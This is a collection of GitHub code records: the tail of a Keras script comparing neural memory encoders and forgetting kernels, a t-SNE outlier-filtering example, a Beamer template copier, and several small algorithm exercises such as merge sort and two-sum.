encoder_states = encoder_output\n encoder.summary()\n \"\"\"\n encoder_states = keras.layers.SimpleRNN(584)(main_sequence)\n #encoder_states = keras.layers.BatchNormalization()(encoder_states)\n #encoder_states = keras.layers.Dropout(0.2)(encoder_states)\n #encoder_states = keras.layers.Dense(1024, activation='relu')(encoder_states)\n #encoder_states = keras.layers.BatchNormalization()(encoder_states)\n #encoder_states = keras.layers.Dropout(0.2)(encoder_states)\n encoder_states = keras.layers.Dense(512)(encoder_states)\n\n print(\"Encoder chosen is simple RNN\")\n print(\"Shape of the encoder output is: \" + str(encoder_states))\n lr = 1.0465692011515144e-05\n elif memory_model == \"CNN\":\n input_shape = (max_seq_len, latent_dim * 2)\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n \"\"\"\n encoder = Sequential()\n # there are 256 different channels and each channel 7 tokens are taken at once, and convolution is performed\n # dimesion of input is max_seq_len(100)*latent_dim*2(512) so after convolution the output size is max_seq_len because padding is same\n # then padding must be such that the max value of 50 outputs are taken, so each filter has 2 outputs for max seq size = 100\n # so total outputs = latent_dim(256)*2 = 512; since output is concatenated with token make sure that the dimensions are same\n encoder.add(\n keras.layers.Conv1D(filters=128, kernel_size=3, padding='same',\n activation='relu', input_shape=input_shape))\n encoder.add(\n keras.layers.Conv1D(filters=256, kernel_size=3, padding='same',\n strides=2, activation='relu'))\n encoder.add(\n keras.layers.Conv1D(filters=512, kernel_size=3, padding='same',\n strides=2, activation='relu'))\n\n # encoder.add(keras.layers.Dropout(0.3))\n encoder.add(keras.layers.GlobalMaxPooling1D())\n encoder.add(keras.layers.Dropout(0.3))\n # flatten makes the shape as [None, None]\n # encoder.add(Flatten())\n # encoder.add(keras.layers.Reshape((latent_dim*2,)))\n # encoder.add(Flatten())\n encoder.add(keras.layers.Dense(latent_dim * 2))\n\n encoder.summary()\n encoder_output = encoder(main_sequence)\n encoder_states = encoder_output\n \"\"\"\n # kernel size=1 because in this problem there is no relation between\n # any 2 tokens.\n # kernel size = 1 activation = tanh; pooling try others\n encoder_states = keras.layers.Conv1D(filters=128, kernel_size=3, padding='same',\n activation='relu', input_shape=input_shape)(main_sequence)\n encoder_states = keras.layers.Conv1D(filters=256, kernel_size=3, padding='same',\n strides=2, activation='relu')(encoder_states)\n encoder_states = keras.layers.Conv1D(filters=512, kernel_size=3, padding='same',\n strides=2, activation='relu')(encoder_states)\n encoder_states = keras.layers.GlobalMaxPooling1D()(encoder_states)\n #encoder_states = keras.layers.BatchNormalization()(encoder_states)\n encoder_states = keras.layers.Dropout(0.3)(encoder_states)\n encoder_states = keras.layers.Dense(latent_dim * 2)(encoder_states)\n\n print(\"Encoder chosen is CNN\")\n print(\"Shape of the encoder output is: \" + str(encoder_states))\n # lr = 0.00012691763008376296\n lr = 7.201800744529144e-05\n elif memory_model == \"transformer\":\n\n embed_dim = 32 # Embedding size for each token\n num_heads = 10 # Number of attention heads\n ff_dim = 8 # Hidden layer size in feed forward network inside transformer\n maxlen = max_seq_len\n vocab_size = max_seq_len\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = 
keras.Input(shape=(latent_dim * 2))\n # inputs = layers.Input(shape=(maxlen,))\n embedding_layer = TokenAndPositionEmbedding(maxlen, vocab_size,\n embed_dim, memory_model)\n x = embedding_layer(main_sequence)\n transformer_block = TransformerBlock(embed_dim, num_heads, ff_dim)\n x = transformer_block(x)\n x = layers.GlobalAveragePooling1D()(x)\n x = layers.Dropout(0.1)(x)\n x = layers.Dense(20, activation=\"relu\")(x)\n x = layers.Dropout(0.1)(x)\n encoder_output = layers.Dense(latent_dim * 2)(x)\n encoder_states = encoder_output\n print(\"Shape of the encoder output is: \" + str(encoder_states))\n elif memory_model == \"transformer_no_orthonormal\":\n embed_dim = 32 # Embedding size for each token\n num_heads = 10 # Number of attention heads\n ff_dim = 32 # Hidden layer size in feed forward network inside transformer\n maxlen = max_seq_len\n vocab_size = maxlen\n main_sequence = layers.Input(shape=(maxlen - 1,))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n\n # max length is 99 - do not restrict number of tokens; doesnt include eos\n # vocab_size is also 100 as there are 100 unique tokens\n embedding_layer = TokenAndPositionEmbedding(maxlen - 1, vocab_size,\n embed_dim, memory_model)\n x = embedding_layer(main_sequence)\n transformer_block = TransformerBlock(embed_dim, num_heads, ff_dim)\n x = transformer_block(x)\n x = layers.GlobalAveragePooling1D()(x)\n x = layers.Dropout(0.1)(x)\n outputs = layers.Dense(latent_dim * 2)(x)\n encoder_states = outputs\n\n # encoder_input_data_train/test must now be decoded to have a list of token_ids\n # encoder_input_data_train = np.array(orthonormal_decode(encoder_input_data_train, orthonormal_vectors))\n # encoder_input_data_test = np.array(orthonormal_decode(encoder_input_data_test, orthonormal_vectors))\n encoder_input_train = raw_seq_train\n encoder_input_val = raw_seq_val\n\n # query_encoder = Sequential()\n # query_ip_shape = query_train.shape[1]\n # query_encoder.add(Dense(latent_dim*2, input_shape=(query_ip_shape,), activation='relu'))\n # query_encoded_op = query_encoder(query_input_node)\n\n num_classes = 2\n input_shape = encoder_states.shape[1]\n\n concatenated_output = tf.reshape(\n tf.reduce_sum(encoder_states * query_input_node, axis=1), (-1, 1))\n\n concatenated_output_shape = 1 # (latent_dim*4)+1\n print(\"The concatenated input shape is: \" + str(concatenated_output_shape))\n\n\n \"\"\"\n y = keras.layers.Concatenate(axis=1)([encoder_states, query_input_node])\n y = keras.layers.BatchNormalization()(y)\n y = keras.layers.Dropout(0.2)(y)\n y = keras.layers.Dense(768, activation=keras.activations.relu)(y)\n y = keras.layers.BatchNormalization()(y)\n y = keras.layers.Dropout(0.2)(y)\n y = keras.layers.Dense(512, activation=keras.activations.relu)(y)\n y = keras.layers.BatchNormalization()(y)\n y = keras.layers.Dropout(0.2)(y)\n similarity_output = keras.layers.Dense(1, activation='sigmoid')(y)\n #similarity_output = keras.layers.Dense(1)(y)\n \"\"\"\n\n #similarity_output = tf.reshape(\n # tf.reduce_sum(encoder_states * query_input_node, axis=1), (-1, 1))\n # construct another model to learn the similarities between the encoded\n # input and the query vector\n # Define the model that will turn\n # `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\n #model = keras.Model([main_sequence, query_input_node], similarity_output)\n model = keras.Model([main_sequence, query_input_node], concatenated_output)\n model.summary()\n\n\n model.compile(\n #optimizer=RMSprop(learning_rate=1e-3),\n 
optimizer=RMSprop(learning_rate=lr),\n #optimizer=Adam(learning_rate=1e-3),\n loss=keras.losses.BinaryCrossentropy(from_logits=True),\n #loss=keras.losses.BinaryCrossentropy(from_logits=False),\n\n metrics=[\"accuracy\"]\n )\n\n return model\n\n\nclass TestCallback(Callback):\n def __init__(self, test_data):\n self.test_data = test_data\n self.test_acc = []\n self.test_loss = []\n\n def on_epoch_end(self, epoch, logs={}):\n x, y = self.test_data\n loss, acc = self.model.evaluate(x, y, verbose=0)\n self.test_acc.append(acc)\n self.test_loss.append(loss)\n print('\\nTesting loss: {}, acc: {}\\n'.format(loss, acc))\n\n\ndef train_model(batch_size, epochs, memory_model, model,\n encoder_input_train, encoder_input_val, query_input_train,\n query_input_val, target_train, target_val, checkpoint_filepath):\n model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n monitor=\"val_accuracy\",\n mode=\"max\",\n verbose=1,\n save_best_only=True\n )\n\n def scheduler(epoch, lr):\n if epoch < 10:\n return lr\n else:\n return lr * 0.9\n\n callback = tf.keras.callbacks.LearningRateScheduler(scheduler)\n\n # test train split on the train dataset\n\n history = model.fit(\n [encoder_input_train, query_input_train],\n target_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=([encoder_input_val, query_input_val], target_val),\n callbacks=[model_checkpoint_callback],\n #callbacks=[model_checkpoint_callback, callback] # ,\n # TestCallback((encoder_input_val, query_input_val))]\n )\n\n print(\"Number of epochs run: \" + str(len(history.history[\"loss\"])))\n\n # save the validation and test accuracy and loss for further plotting\n # np.save('test_accuracy_' + str(memory_model), np.array(test_acc))\n # np.save('test_loss_' + str(memory_model), np.array(test_loss))\n np.save('val_accuracy_' + str(memory_model),\n np.array(history.history[\"val_accuracy\"]))\n np.save('val_loss_' + str(memory_model),\n np.array(history.history[\"val_loss\"]))\n\n return\n\n\ndef predict_model(model, target_val, encoder_input_val,\n query_input_val):\n\n y_test = model.predict([encoder_input_val, query_input_val])\n y_test = sigmoid(y_test)\n # y_pred = np.argmax(y_test, axis=1)\n # for the kernel functions you would need values which are not 0 or 1\n y_pred_binary = np.array([1 if y > 0.5 else 0 for y in y_test])\n y_pred_continuous = y_test\n return y_pred_binary, y_pred_continuous\n\n\ndef compute_save_metrics(max_seq_len, memory_model, y_true, y_pred,\n sequence_length_val,\n rep_token_pos_val):\n # total balanced accuracy accross the entire test dataset\n y_pred = sigmoid(y_pred)\n y_pred = np.array([1 if y > 0.5 else 0 for y in y_pred])\n balanced_accuracy = balanced_accuracy_score(y_true, y_pred)\n\n # Find the balanced accuracy accross different sequence length\n sequence_len_arr = np.array(sequence_length_val)\n # balanced_acc_seq_len of 0 and 1 are meaningless\n balanced_acc_seq_len = np.zeros(\n shape=(max_seq_len, max_seq_len)) # [0]*(max_seq_len+1)\n\n dist_arr = []\n rep_first_token_test = np.array(rep_token_pos_val)\n # dist_test == max_seq_len means there were no repeats,\n # should be fine as we ignore entries with max len later on\n rep_token_test = np.where(rep_first_token_test == -1, max_seq_len,\n rep_first_token_test)\n dist_test = np.subtract(sequence_len_arr, np.add(rep_token_test, 1))\n\n for seq_len in range(1, max_seq_len):\n # balanced_acc_seq_len.append([])\n for dist in range(0, seq_len):\n\n # get the indices of samples which have a particular 
sequence length\n seq_len_indices = np.where(\n (sequence_len_arr == seq_len) & (dist_test == dist))\n\n # splice y_true and y_pred based on the seq length\n y_true_seq_len = np.take(y_true, seq_len_indices[0])\n y_pred_seq_len = np.take(y_pred, seq_len_indices[0])\n\n #print(\"The number of sequences are: \" + str(len(y_true_seq_len)))\n if len(y_true_seq_len) > 0:\n balanced_acc_seq_len[seq_len][dist] = balanced_accuracy_score(\n y_true_seq_len, y_pred_seq_len)\n\n #print(\n # \"Balanced accuracy for seq len {} and dist {} is {}\".format(\n # seq_len,\n # dist,\n # balanced_acc_seq_len[\n # seq_len][\n # dist]))\n\n # save the balanced accuracy per seq len\n f = open('balanced_acc_seq_len_dist_' + memory_model + '.pkl', 'wb')\n pickle.dump(balanced_acc_seq_len, f, -1)\n f.close()\n\n return dist_test, balanced_accuracy\n\n\ndef sigmoid(x):\n z = np.exp(-1.0 * x)\n sig = 1.0 / (1.0 + z)\n return sig\n\n\ndef compute_optimal_tau(kern, avg_test_acc, y_true, y_pred, dist_test,\n sequence_length_val):\n # difficulty = seq len; time elapsed since last review = dist; strength =\n # average accuracy.\n # normalize s and d by dividing by 100\n x = [((s * d * 1.0) / ((avg_test_acc+np.finfo(float).eps) * 100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n #test_accs = np.array(y_true.ravel()) & np.array(y_pred.ravel())\n #print(test_accs.shape)\n #test_accs = [0.1 if acc < 1. else 0.9 for acc in\n # test_accs.squeeze().tolist()]\n # test accs now are continuous non-zero values\n\n test_accs = np.array(y_pred.ravel())\n test_accs = [0.001 if test_acc == 0 else test_acc for test_acc in test_accs]\n\n\n if kern == 'Gaussian':\n # throughout training - take average error\n # earlyon maybe a different model is better and maybe at the end a diff\n # model is good - good to capture\n # do this on the validation data\n\n # epochs1 - k use validation acc as strength of model\n # at teh end use test acc as strength of model\n # s and d normalize - s - 1 - 100 -> 0.01 - 1 d - 0.01 - 1\n # use validation acc instead of test acc - best validation acc\n # best epoch try all functions - both papers on val data\n # then do this for every epoch - val data\n # dont use test data to tune hyperparams\n # gaussian\n num = -1.0 * np.sum(np.log(test_accs))\n den = np.sum(np.power(x, 2))\n\n if kern == \"Laplacian\":\n num = -1.0 * np.sum(np.log(test_accs))\n den = np.sum(x)\n\n if kern == \"Linear\":\n num = np.sum(np.sum(np.subtract(1, test_accs)))\n den = np.sum(x)\n\n if kern == \"Cosine\":\n num = np.sum(np.arccos(np.subtract(np.multiply(2., test_accs), 1)))\n den = np.pi * np.sum(x)\n\n if kern == \"Quadratic\":\n num = np.sum(np.subtract(1.0, test_accs))\n den = np.sum(np.power(x, 2))\n\n if kern == \"Secant\":\n # num = np.sum(np.log(1. / np.sum(test_accs) + np.sqrt(\n # 1. / np.sum(np.subtract(np.power(test_accs, 2), 1.)))))\n num = np.sum(np.log(1. / np.sum(test_accs) + np.sqrt(\n np.subtract(np.sum((1. 
/ np.power(test_accs, 2))), 1.))))\n den = np.sum(np.power(x, 2))\n\n tau = num * 1.0 / den\n return tau, test_accs\n\n\ndef compute_l2_loss(tau, kern, test_accs):\n if kern == 'Gaussian':\n print(\"computing l2 loss\")\n f_gauss = np.exp(-1 * tau * np.sum(np.power(x, 2)))\n # test_acc b/w 0 and 1\n f_gauss_loss = np.mean(np.power((f_gauss - test_accs), 2))\n return f_gauss_loss\n\n if kern == \"Laplacian\":\n f_lap = np.exp(-1 * tau * np.sum(x))\n # test_acc b/w 0 and 1\n f_lap_loss = np.mean(np.power((f_lap - test_accs), 2))\n return f_lap_loss\n\n if kern == \"Linear\":\n f_lin = (1 - (1 * tau * np.sum(x)))\n f_lin_loss = np.mean(np.power((f_lin - test_accs), 2))\n return f_lin_loss\n\n if kern == \"Cosine\":\n f_cos = 1 / 2 * np.cos(tau * np.sum(x) * np.pi)\n f_cos_loss = np.mean(np.power((f_cos - test_accs), 2))\n return f_cos_loss\n\n if kern == \"Quadratic\":\n f_qua = 1 - tau * np.sum(np.power(x, 2))\n f_qua_loss = np.mean(np.power((f_qua - test_accs), 2))\n return f_qua_loss\n\n if kern == \"Secant\":\n f_sec = 2 * 1.0 / (np.exp(-1 * tau * np.sum(np.power(x, 2))) + np.exp(\n 1 * tau * np.sum(np.power(x, 2))))\n f_sec_loss = np.mean(np.power((f_sec - test_accs), 2))\n return f_sec_loss\n\n\ndef compute_loss_forgetting_functions(forgetting_function, avg_test_acc,\n dist_test, sequence_length_val, test_accs):\n\n # difficulty = seq len; time elapsed since last review = dist; strength =\n # average accuracy.\n # exp(-seq_len*intervening_tokens/avg_test_acc)\n\n if forgetting_function == 'diff_dist_strength':\n x = [((s * d * 1.0) / ((avg_test_acc+np.finfo(float).eps) * 100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n x = np.array(x)\n f_diff_dist_strength = np.exp(-x)\n f_diff_dist_strength_loss = np.mean(np.power\n ((f_diff_dist_strength - test_accs), 2))\n return f_diff_dist_strength_loss\n\n # exp(-seq_len*intervening_tokens)\n elif forgetting_function == 'diff_dist':\n x = [((s * d * 1.0) / (100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n x = np.array(x)\n f_diff_dist = np.exp(-x)\n f_diff_dist_loss = np.mean(np.power\n ((f_diff_dist - test_accs), 2))\n return f_diff_dist_loss\n\n # exp(-seq_len/avg_test_acc)\n elif forgetting_function == 'diff_strength':\n x = [((s * 1.0) / ((avg_test_acc+np.finfo(float).eps) * 100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n x = np.array(x)\n f_diff_strength = np.exp(-x)\n f_diff_strength_loss = np.mean(np.power\n ((f_diff_strength - test_accs), 2))\n return f_diff_strength_loss\n\ndef kernel_matching(y_true, y_pred, dist_test, sequence_length_val,\n y_pred_binary_pos_samples):\n kernels = ['Gaussian', 'Laplacian', 'Linear', 'Cosine', 'Quadratic',\n 'Secant']\n\n avg_test_acc = balanced_accuracy_score(y_true, y_pred_binary_pos_samples)\n print(\"computing optimal tau\")\n kern_loss = []\n tau_kernels = []\n exp_forgetting_function_loss = []\n # compute x - seq_len*dist\n\n for kern in kernels:\n print(\"Kernel type is {}\".format(kern))\n\n tau, test_accs = compute_optimal_tau(kern, avg_test_acc, y_true, y_pred,\n dist_test, sequence_length_val)\n tau_kernels.append(tau)\n print(\"optimal value of tau is {}\".format(tau))\n l2_loss = compute_l2_loss(tau, kern, test_accs)\n print(\"L2 loss for kernel {} is {}\".format(kern, l2_loss))\n kern_loss.append(l2_loss)\n\n # compute l2 loss for functions from Reddy et al paper\n exp_forgetting_functions = ['diff_dist_strength', 'diff_dist',\n 'diff_strength']\n\n #test_accs = np.array(y_true.ravel()) & np.array(y_pred.ravel())\n test_accs = 
np.array(y_pred.ravel())\n for exp_forgetting_function in exp_forgetting_functions:\n exp_forgetting_l2_loss = compute_loss_forgetting_functions(\n exp_forgetting_function, avg_test_acc, dist_test, sequence_length_val,\n test_accs)\n exp_forgetting_function_loss.append(exp_forgetting_l2_loss)\n print(\"L2 loss for forgetting function {} is {}\".format(exp_forgetting_function, exp_forgetting_l2_loss))\n\n\n # find the least loss\n min_index = kern_loss.index(min(kern_loss))\n print(\"The best kernel is {}\".format(kernels[min_index]))\n print(\"the value of the loss is {}\".format(min(kern_loss)))\n\n min_index_exp_forgetting_function = \\\n exp_forgetting_function_loss.index(min(exp_forgetting_function_loss))\n print(\"The best forgetting function is {}\".format(exp_forgetting_functions[min_index_exp_forgetting_function]))\n\n print(\"the value of the loss is {}\".format(min(exp_forgetting_function_loss)))\n return kernels[min_index], tau_kernels[min_index]\n\n\ndef main(args):\n if args.debug == 1:\n args.root_location = \\\n '/Users/sherin/Documents/research/server_version_memory/Memory/'\n\n else:\n #args.root_location = '/workspace/memory_clean/Memory/'\n args.root_location = '/data/memory/'\n print(\"Loading the dataset\")\n x, num_samples, sequence_len, token_repeated, rep_token_first_pos, \\\n raw_sequence, target_y, orth_vectors = load_dataset(args)\n\n print(\"processing the dataset\")\n encoder_input_data, query_data, raw_sequence_padded = \\\n process_data(args.max_seq_len, args.latent_dim, args.padding,\n args.nn_model, num_samples,\n x, raw_sequence)\n\n print(\"Creating train and test split\")\n\n # train test split\n (encoder_input_data_train, encoder_input_data_test,\n query_train, query_test,\n target_y_train, target_y_test,\n sequence_len_train, sequence_len_test,\n token_repeated_train, token_repeated_test,\n rep_token_first_pos_train, rep_token_first_pos_test,\n raw_sequence_train, raw_sequence_test) = train_test_split(\n encoder_input_data,\n query_data,\n target_y,\n sequence_len,\n token_repeated,\n rep_token_first_pos,\n raw_sequence_padded,\n random_state=2,\n test_size=0.3)\n\n # train val split\n (encoder_input_train, encoder_input_val,\n query_input_train, query_input_val,\n target_train, target_val,\n sequence_length_train, sequence_length_val,\n token_rep_train, token_rep_val,\n rep_token_pos_train, rep_token_pos_val,\n raw_seq_train, raw_seq_val) = train_test_split(\n encoder_input_data_train,\n query_train,\n target_y_train,\n sequence_len_train,\n token_repeated_train,\n rep_token_first_pos_train,\n raw_sequence_train,\n random_state=2,\n test_size=0.3)\n\n print(\"The number of examples in the training data set is \" + str(\n len(encoder_input_train)))\n print(\"The number of example in the test data set is \" + str(\n len(encoder_input_data_test)))\n print(\"The number of example in the validation data set is \" + str(\n len(encoder_input_val)))\n\n # define the neural network model\n print(\"defining the Neural Network\")\n model = define_nn_model(args.max_seq_len, args.nn_model, args.latent_dim,\n raw_seq_train,\n raw_seq_val)\n\n # train and save the best model\n # adding params like epoch and val accuracy will save all the models\n checkpoint_filepath = 'best_model_' + str(args.nn_model)\n\n print(\"training the neural network\")\n train_model(args.batch_size, args.epochs, args.nn_model, model,\n encoder_input_train, encoder_input_val, query_input_train,\n query_input_val, target_train, target_val, checkpoint_filepath)\n\n # load the best model after 
training is complete\n print(\"loading the best model\")\n model = keras.models.load_model(checkpoint_filepath)\n\n # test the model on novel data\n print(\"predicting on novel inputs\")\n y_pred_binary, y_pred_continuous = predict_model(model, target_val,\n encoder_input_val, query_input_val)\n\n # compute accuracy based on seq len and number of intervening tokens\n dist_test, balanced_accuracy = compute_save_metrics(args.max_seq_len,\n args.nn_model,\n target_val, y_pred_binary,\n sequence_length_val,\n rep_token_pos_val)\n\n print(\"The balanced accuracy is {}\".format(balanced_accuracy))\n\n # we need to calculate p(recall) only for positive instances, whether the\n # model is able to recall a previously seen item or not, so remove the\n # negative instances : where the query token is not previously seen by the\n # model\n negative_samples = np.where(target_val == 0)\n\n\n target_val_pos_samples = np.delete(target_val, negative_samples[0])\n y_pred_pos_samples = np.delete(y_pred_continuous, negative_samples[0])\n y_pred_binary_pos_samples = np.delete(y_pred_binary, negative_samples[0])\n dist_pos_samples = np.delete(dist_test, negative_samples[0])\n seq_len_test_pos_samples = np.delete(sequence_length_val, negative_samples[0])\n\n\n # learn which kernel best models the test accuracy\n print(\"Finding the best kernel to model the test accuracy\")\n kernel, tau = kernel_matching(target_val_pos_samples, y_pred_pos_samples,\n dist_pos_samples, seq_len_test_pos_samples,\n y_pred_binary_pos_samples)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nn_model\", default=\"lstm\", type=str,\n help=\"neural network model to be used\")\n parser.add_argument(\"--epochs\", default=1, type=int,\n help=\"Number of epochs to be run for\")\n parser.add_argument(\"--batch_size\", default=50, type=int,\n help=\"Number of samples in one batch\")\n parser.add_argument(\"--latent_dim\", default=256, type=int,\n help=\"size of the memory encoding\")\n parser.add_argument(\"--padding\", default=\"post_padding\", type=str,\n help=\"Type of padding, pre-padding or \"\n \"post-padding\")\n parser.add_argument(\"--max_seq_len\", default=26, type=int,\n help=\"Maximum sequence length\")\n parser.add_argument(\"--debug\", type=int, default=1, help=\"is it debug\")\n args = parser.parse_args()\n\n print(args)\n\n main(args)\n","repo_name":"SherinBojappa/Memory","sub_path":"memory_encoder_mlp.py","file_name":"memory_encoder_mlp.py","file_ext":"py","file_size_in_byte":36253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28932318296","text":"\"\"\"\nSmall example doing data filtering on digits for t-SNE embedding.\n\"\"\"\nfrom time import time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import manifold, datasets, decomposition, pipeline\n\nfrom outlier_filtering import EllipticEnvelopeFilter\nfrom subsampler import SubSampler\n\ndigits = datasets.load_digits()\nX = digits.data\ny = digits.target\nn_samples, n_features = X.shape\n\n\n#----------------------------------------------------------------------\n# Scale and visualize the embedding vectors\ndef plot_embedding(X, y, title=None):\n x_min, x_max = np.min(X, 0), np.max(X, 0)\n X = (X - x_min) / (x_max - x_min)\n\n plt.figure()\n plt.subplot(111)\n for this_x, this_y in zip(X, y):\n plt.text(this_x[0], this_x[1], str(this_y),\n color=plt.cm.Set1(this_y / 10.),\n fontdict={'weight': 'bold', 'size': 9})\n\n plt.xticks([]), 
plt.yticks([])\n if title is not None:\n plt.title(title)\n\n\nprint(\"Computing t-SNE embedding\")\n\ntsne = manifold.TSNE(n_components=2, init='pca', random_state=0)\n\nsubsampler = SubSampler(random_state=1, ratio=.5)\n\nfiltering = EllipticEnvelopeFilter(random_state=1)\n\nt0 = time()\n\n# We need a PCA reduction of X because MinCovDet crashes elsewhere\nX_pca = decomposition.RandomizedPCA(n_components=30).fit_transform(X)\nfiltering.fit_pipe(*subsampler.transform_pipe(X_pca))\n\nprint(\"Fitting filtering done: %.2fs\" % (time() - t0))\n\nX_red, y_red = filtering.transform_pipe(X_pca, y)\n\nX_tsne = tsne.fit_transform(X_red)\n\nplot_embedding(X_tsne, y_red,\n \"With outlier_filtering\")\n\n\n# Now without outlier_filtering\nX_tsne = tsne.fit_transform(X_pca)\n\nplot_embedding(X_tsne, y,\n \"Without outlier_filtering\")\n\nplt.show()\n\n","repo_name":"scikit-learn/enhancement_proposals","sub_path":"slep001/example_outlier_digits.py","file_name":"example_outlier_digits.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"68"} +{"seq_id":"43039931834","text":"def paul(x):\n # your code here\n kata = x.count(\"kata\") * 5\n petesKata = x.count('Petes kata') * 10\n eating = x.count('eating')\n total = kata + petesKata + eating\n \n if (total < 40):\n return \"Super happy!\"\n elif (40 <= total < 70):\n return \"Happy!\"\n elif (70 <= total < 100):\n return \"Sad!\"\n else:\n return 'Miserable!'\n\nprint(paul(['life', 'eating', 'life']))\nprint(paul(['life', 'kata', 'life', 'kata', 'eating', 'Petes kata', 'eating', 'life', 'Petes kata', 'life']))","repo_name":"JHanek3/CodeWars","sub_path":"py/pauls_misery.py","file_name":"pauls_misery.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9520549307","text":"#!/usr/bin/python\n\nimport os\nimport sys\nfrom pathlib import Path\n\ndef get_template_dir():\n home = os.path.expanduser('~')\n path = Path(home + '/.md2x/beamer-skeleton')\n if path.exists():\n return str(path)\n \n root = os.path.dirname(__file__).replace(os.sep, '/')\n path = Path(root + '/beamer-skeleton')\n if path.exists():\n print(path.name)\n return str(path)\n \n print('No template directory. 
Aborted.', file=sys.stderr)\n exit(1)\n\ndef copy_templates(template_dir, dirs):\n for a in dirs:\n p = Path(a)\n if not p.exists():\n p.mkdir()\n else:\n print(f'The directory already exists: {a}')\n\n with open(template_dir + '/Makefile', encoding='shift_jis') as fi:\n str = fi.read()\n str = str.replace('{slide_skeleton}', a)\n with open(a + '/Makefile', 'w', encoding='shift_jis') as fo:\n fo.write(str)\n\n with open(template_dir + '/config.json', encoding='utf-8') as fi:\n str = fi.read()\n with open(a + '/config.json', 'w', encoding='utf-8') as fo:\n fo.write(str)\n\n with open(template_dir + '/slide-skeleton.md', encoding='utf-8') as fi:\n str = fi.read()\n with open(a + '/' + a + '.md', 'w', encoding='utf-8') as fo:\n fo.write(str)\n\ndef main():\n copy_templates(get_template_dir(), sys.argv[1:])\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"circleratio/md2x","sub_path":"bmconfig.py","file_name":"bmconfig.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4672128334","text":"def delete_node():\n value = list(map(int, input().split()))\n\n lstr = []\n lstr.append(value[1])\n target = value[-1]\n for i in range(2, value[0] * 2 - 1, 2):\n index = lstr.index(value[i + 1])\n new_value_prefix = lstr[:index + 1]\n new_value_suffix = lstr[index + 1:]\n new_value_prefix.append(value[i])\n lstr = new_value_prefix + new_value_suffix\n\n ind = lstr.index(target)\n lstr.pop(ind)\n return lstr\n\n\nif __name__ == '__main__':\n while 1:\n try:\n res = delete_node()\n print(\" \".join(map(str, res)))\n except Exception:\n break\n","repo_name":"heavens420/base","sub_path":"algorithm/从单向链表中删除指定节点.py","file_name":"从单向链表中删除指定节点.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"33170945922","text":"def merge_sort(alist):\n \"\"\"归并排序\n 归并排序不改变原列表,而是重新生成一个列表\n 最优时间复杂度和最坏时间复杂度都是 O(nlogn)\n 是稳定性排序\n \"\"\"\n n = len(alist)\n if n == 1:\n return alist\n mid = n // 2 # 将列表分为两个部分\n left_sorted_li = merge_sort(alist[:mid]) # 对左半部分进行归并排序\n right_sorted_li = merge_sort(alist[mid:]) # 对右半部分进行归并排序\n\n # 合并两个有序集合\n left, right = 0, 0\n merge_sort_li = [] # 将合并后的列表生成一个新列表\n\n left_n = len(left_sorted_li)\n right_n = len(right_sorted_li)\n\n while left < left_n and right < right_n:\n if left_sorted_li[left] <= right_sorted_li[right]:\n merge_sort_li.append(left_sorted_li[left])\n left += 1\n else:\n merge_sort_li.append(right_sorted_li[right])\n right += 1\n # 当有一边所有元素全部添加到新列表时\n merge_sort_li += left_sorted_li[left:]\n merge_sort_li += right_sorted_li[right:]\n\n return merge_sort_li\n\n\nif __name__ == '__main__':\n alist = [2, 5, 91, 38, 45, 1, 9, 0, 10]\n print(alist)\n print(merge_sort(alist))\n print(alist)\n","repo_name":"wujarvis/leetcode","sub_path":"sort/归并排序.py","file_name":"归并排序.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71754455576","text":"#coding=utf-8\n# class Solution:\n# def twoSum(self, nums, target):\n# \"\"\"\n# :type nums: List[int]\n# :type target: int\n# :rtype: List[int]\n# \"\"\"\n# for i in nums:\n# other_num = target - i\n# if other_num in nums:\n# if other_num != i:return [nums.index(i),nums.index(other_num)]\n# else:\n# iindex = nums.index(i)\n# llist = nums[iindex+1:]\n# if other_num in llist:\n# return [iindex,llist.index(i)+iindex+1]\n# 
return('没有匹配的数字')\n\nclass Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n other_num = target - nums[i]\n if other_num in nums:\n if other_num != nums[i]:return [i,nums.index(other_num)]\n else:\n llist = nums[i+1:]\n if other_num in llist:\n return [i,llist.index(other_num)+i+1]\n return('没有匹配的数字')\n\nnums = [2, 3,5,7, 11, 15]\ntarget = 10\ntwosum = Solution()\nprint(twosum.twoSum(nums,target))\n","repo_name":"tianjinqiujie/LeetCode","sub_path":"LeetCode/1. Two_Sum.py","file_name":"1. Two_Sum.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39686973266","text":"class ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n def print(self):\n print(\"Node(\" + str(self.val) + \")\", end=\"\")\n if self.next is not None:\n print(\" -> \", end =\"\")\n self.next.print()\n\n# Problem code\ndef addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:\n if not l1 and not l2:\n 